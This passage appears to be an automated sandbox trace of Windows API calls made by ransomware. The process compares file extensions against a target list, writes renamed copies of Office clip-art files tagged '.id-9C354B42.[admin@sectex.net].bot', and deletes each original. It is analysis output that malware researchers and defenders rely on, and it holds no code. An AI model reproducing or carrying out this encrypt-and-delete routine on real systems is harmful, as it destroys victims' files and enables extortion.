	[0164.385] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0164.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG") returned 63
	[0164.385] lstrlenW (lpString=".dbf") returned 4
	[0164.385] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0164.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG") returned 63
	[0164.385] lstrlenW (lpString=".1cd") returned 4
	[0164.385] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0164.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG") returned 63
	[0164.385] lstrlenW (lpString=".jpg") returned 4
	[0164.385] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0164.385] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0164.385] lstrlenW (lpString="J0152430.WMF") returned 12
	[0164.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152430.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0164.667] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=14132) returned 1
	[0164.667] CloseHandle (hObject=0x3e8) returned 1
	[0164.667] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152430.wmf")) returned 0x20
	[0164.667] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152430.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0165.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152430.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0165.923] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.923] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152430.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0168.743] GetLastError () returned 0x0
	[0168.743] ReadFile (in: hFile=0x37c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x3734, lpOverlapped=0x0) returned 1
	[0169.035] WriteFile (in: hFile=0x3b0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x3740, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x3740, lpOverlapped=0x0) returned 1
	[0169.036] ReadFile (in: hFile=0x37c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.036] WriteFile (in: hFile=0x3b0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.036] SetEndOfFile (hFile=0x3b0) returned 1
	[0169.036] CloseHandle (hObject=0x3b0) returned 1
	[0169.036] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.036] SetEndOfFile (hFile=0x37c) returned 1
	[0169.039] CloseHandle (hObject=0x37c) returned 1
	[0169.039] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.039] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152430.wmf")) returned 1
	[0169.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF") returned 63
	[0169.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF") returned 63
	[0169.040] lstrlenW (lpString=".doc") returned 4
	[0169.040] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.040] lstrlenW (lpString=".docx") returned 5
	[0169.040] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0169.040] lstrlenW (lpString=".pdf") returned 4
	[0169.040] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.040] lstrlenW (lpString=".xls") returned 4
	[0169.040] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.040] lstrlenW (lpString=".xlsx") returned 5
	[0169.040] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0169.040] lstrlenW (lpString=".ppt") returned 4
	[0169.040] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF") returned 63
	[0169.040] lstrlenW (lpString=".zip") returned 4
	[0169.040] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.040] lstrlenW (lpString=".rar") returned 4
	[0169.040] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.040] lstrlenW (lpString=".bz2") returned 4
	[0169.040] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.040] lstrlenW (lpString=".7z") returned 3
	[0169.040] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF") returned 63
	[0169.040] lstrlenW (lpString=".dbf") returned 4
	[0169.040] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF") returned 63
	[0169.040] lstrlenW (lpString=".1cd") returned 4
	[0169.040] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF") returned 63
	[0169.040] lstrlenW (lpString=".jpg") returned 4
	[0169.040] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF") returned 63
	[0169.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF") returned 63
	[0169.041] lstrlenW (lpString=".doc") returned 4
	[0169.041] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.041] lstrlenW (lpString=".docx") returned 5
	[0169.041] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0169.041] lstrlenW (lpString=".pdf") returned 4
	[0169.041] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.041] lstrlenW (lpString=".xls") returned 4
	[0169.041] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.041] lstrlenW (lpString=".xlsx") returned 5
	[0169.041] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0169.041] lstrlenW (lpString=".ppt") returned 4
	[0169.041] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF") returned 63
	[0169.041] lstrlenW (lpString=".zip") returned 4
	[0169.041] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.041] lstrlenW (lpString=".rar") returned 4
	[0169.041] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.041] lstrlenW (lpString=".bz2") returned 4
	[0169.041] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.041] lstrlenW (lpString=".7z") returned 3
	[0169.041] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF") returned 63
	[0169.041] lstrlenW (lpString=".dbf") returned 4
	[0169.041] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF") returned 63
	[0169.042] lstrlenW (lpString=".1cd") returned 4
	[0169.042] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF") returned 63
	[0169.042] lstrlenW (lpString=".jpg") returned 4
	[0169.042] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.042] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.042] lstrlenW (lpString="J0152696.WMF") returned 12
	[0169.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152696.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0169.090] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=7320) returned 1
	[0169.090] CloseHandle (hObject=0x3e8) returned 1
	[0169.090] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152696.wmf")) returned 0x20
	[0169.102] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152696.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152696.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0169.103] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.103] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152696.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0169.125] GetLastError () returned 0x0
	[0169.125] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1c98, lpOverlapped=0x0) returned 1
	[0169.156] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1ca0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1ca0, lpOverlapped=0x0) returned 1
	[0169.157] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.157] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.157] SetEndOfFile (hFile=0x398) returned 1
	[0169.158] CloseHandle (hObject=0x398) returned 1
	[0169.158] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.158] SetEndOfFile (hFile=0x3b8) returned 1
	[0169.160] CloseHandle (hObject=0x3b8) returned 1
	[0169.160] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.175] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152696.wmf")) returned 1
	[0169.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF") returned 63
	[0169.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF") returned 63
	[0169.176] lstrlenW (lpString=".doc") returned 4
	[0169.176] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.176] lstrlenW (lpString=".docx") returned 5
	[0169.176] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0169.176] lstrlenW (lpString=".pdf") returned 4
	[0169.176] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.176] lstrlenW (lpString=".xls") returned 4
	[0169.176] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.176] lstrlenW (lpString=".xlsx") returned 5
	[0169.177] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0169.177] lstrlenW (lpString=".ppt") returned 4
	[0169.177] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF") returned 63
	[0169.177] lstrlenW (lpString=".zip") returned 4
	[0169.177] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.177] lstrlenW (lpString=".rar") returned 4
	[0169.177] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.177] lstrlenW (lpString=".bz2") returned 4
	[0169.177] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.177] lstrlenW (lpString=".7z") returned 3
	[0169.177] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF") returned 63
	[0169.177] lstrlenW (lpString=".dbf") returned 4
	[0169.177] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF") returned 63
	[0169.177] lstrlenW (lpString=".1cd") returned 4
	[0169.177] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF") returned 63
	[0169.177] lstrlenW (lpString=".jpg") returned 4
	[0169.177] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF") returned 63
	[0169.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF") returned 63
	[0169.177] lstrlenW (lpString=".doc") returned 4
	[0169.177] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.177] lstrlenW (lpString=".docx") returned 5
	[0169.177] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0169.177] lstrlenW (lpString=".pdf") returned 4
	[0169.177] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.177] lstrlenW (lpString=".xls") returned 4
	[0169.177] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.177] lstrlenW (lpString=".xlsx") returned 5
	[0169.178] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0169.178] lstrlenW (lpString=".ppt") returned 4
	[0169.178] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF") returned 63
	[0169.178] lstrlenW (lpString=".zip") returned 4
	[0169.178] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.178] lstrlenW (lpString=".rar") returned 4
	[0169.178] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.178] lstrlenW (lpString=".bz2") returned 4
	[0169.178] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.178] lstrlenW (lpString=".7z") returned 3
	[0169.178] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF") returned 63
	[0169.178] lstrlenW (lpString=".dbf") returned 4
	[0169.178] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF") returned 63
	[0169.178] lstrlenW (lpString=".1cd") returned 4
	[0169.178] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF") returned 63
	[0169.178] lstrlenW (lpString=".jpg") returned 4
	[0169.178] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.178] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.178] lstrlenW (lpString="J0152884.WMF") returned 12
	[0169.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152884.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0169.179] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=6956) returned 1
	[0169.179] CloseHandle (hObject=0x37c) returned 1
	[0169.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152884.wmf")) returned 0x20
	[0169.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152884.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152884.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0169.179] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.179] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152884.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0169.180] GetLastError () returned 0x0
	[0169.180] ReadFile (in: hFile=0x37c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1b2c, lpOverlapped=0x0) returned 1
	[0169.201] WriteFile (in: hFile=0x3b0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1b30, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1b30, lpOverlapped=0x0) returned 1
	[0169.201] ReadFile (in: hFile=0x37c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.201] WriteFile (in: hFile=0x3b0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.202] SetEndOfFile (hFile=0x3b0) returned 1
	[0169.202] CloseHandle (hObject=0x3b0) returned 1
	[0169.202] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.202] SetEndOfFile (hFile=0x37c) returned 1
	[0169.204] CloseHandle (hObject=0x37c) returned 1
	[0169.204] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.274] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152884.wmf")) returned 1
	[0169.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF") returned 63
	[0169.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF") returned 63
	[0169.275] lstrlenW (lpString=".doc") returned 4
	[0169.275] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.275] lstrlenW (lpString=".docx") returned 5
	[0169.275] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0169.275] lstrlenW (lpString=".pdf") returned 4
	[0169.275] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.275] lstrlenW (lpString=".xls") returned 4
	[0169.275] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.275] lstrlenW (lpString=".xlsx") returned 5
	[0169.275] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0169.275] lstrlenW (lpString=".ppt") returned 4
	[0169.275] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF") returned 63
	[0169.275] lstrlenW (lpString=".zip") returned 4
	[0169.275] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.275] lstrlenW (lpString=".rar") returned 4
	[0169.275] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.275] lstrlenW (lpString=".bz2") returned 4
	[0169.275] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.275] lstrlenW (lpString=".7z") returned 3
	[0169.275] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF") returned 63
	[0169.275] lstrlenW (lpString=".dbf") returned 4
	[0169.275] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF") returned 63
	[0169.276] lstrlenW (lpString=".1cd") returned 4
	[0169.276] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF") returned 63
	[0169.276] lstrlenW (lpString=".jpg") returned 4
	[0169.276] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF") returned 63
	[0169.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF") returned 63
	[0169.276] lstrlenW (lpString=".doc") returned 4
	[0169.276] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.276] lstrlenW (lpString=".docx") returned 5
	[0169.276] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0169.276] lstrlenW (lpString=".pdf") returned 4
	[0169.276] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.276] lstrlenW (lpString=".xls") returned 4
	[0169.276] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.276] lstrlenW (lpString=".xlsx") returned 5
	[0169.276] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0169.276] lstrlenW (lpString=".ppt") returned 4
	[0169.276] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF") returned 63
	[0169.276] lstrlenW (lpString=".zip") returned 4
	[0169.276] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.276] lstrlenW (lpString=".rar") returned 4
	[0169.276] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.276] lstrlenW (lpString=".bz2") returned 4
	[0169.276] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.276] lstrlenW (lpString=".7z") returned 3
	[0169.276] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF") returned 63
	[0169.276] lstrlenW (lpString=".dbf") returned 4
	[0169.276] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF") returned 63
